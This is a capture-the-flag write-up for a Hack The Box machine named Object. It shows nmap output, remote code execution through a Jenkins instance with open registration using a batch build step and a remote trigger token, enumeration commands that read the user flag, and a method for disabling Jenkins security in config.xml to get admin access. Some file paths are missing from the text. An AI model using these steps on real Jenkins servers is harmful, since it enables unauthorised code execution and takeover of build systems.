Object

Category: Fullpwn

Solver: lmarschk

Flag: HTB{c1_cd_c00k3d_up_1337!}

Writeup

When scanning the machine, we get the following results

Nmap scan report for 10.129.96.74
Host is up (0.036s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Mega Engines
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open  http    Jetty 9.4.43.v20210629
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.43.v20210629)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.79 seconds

When looking at port 8080, we find a Jenkins with an open registration form. When registering there, we can create a new project via New Item -> Freestyle Project.

After Job creation, we can add a build step named Execute Windows batch command. With this we can execute single commands on the host system as the Jenkins is configured to run jobs as oliver.

To trigger running of the job, we have to enable Trigger build remotely. Therefore, we add an authentication token to trigger a single build. We set the token to token, so our URL is http://10.129.96.74:8080/job/HackIt/build?token=token.

The output of the job script can be read via the Jenkins web ui. Via the output we are able to find the file C:\, which contains the flag.

Our full batch job script is:

whoami

dir C:\
dir C:\Users
dir C:\Users\oliver
dir C:\Users\oliver\Desktop
dir C:\Users\oliver\Documents

more
dir C:\Users\oliver\Desktop\user.txt

Further notes

By modifying the config file of Jenkins, it is also possible to get full administration access to the Jenkins platform. To achieve that, we have to modify the config.xml in the Jenkins configuration directory, which is available in the variable JENKINS_HOME by setting the value use-security to false. To apply these settings we have to restart Jenkins, which can be done by calling restart to jenkins.exe. Afterwards, the user created by us is essentially an admin user on Jenkins.

With that said, we are also able to execute Groovy scripts without invoking a job. Unfortunately as the machine blocks all outgoing network connections, we were not able to fetch any data from external sources or establish an reverse shell.

Writeup#

Further notes#

Writeup

Further notes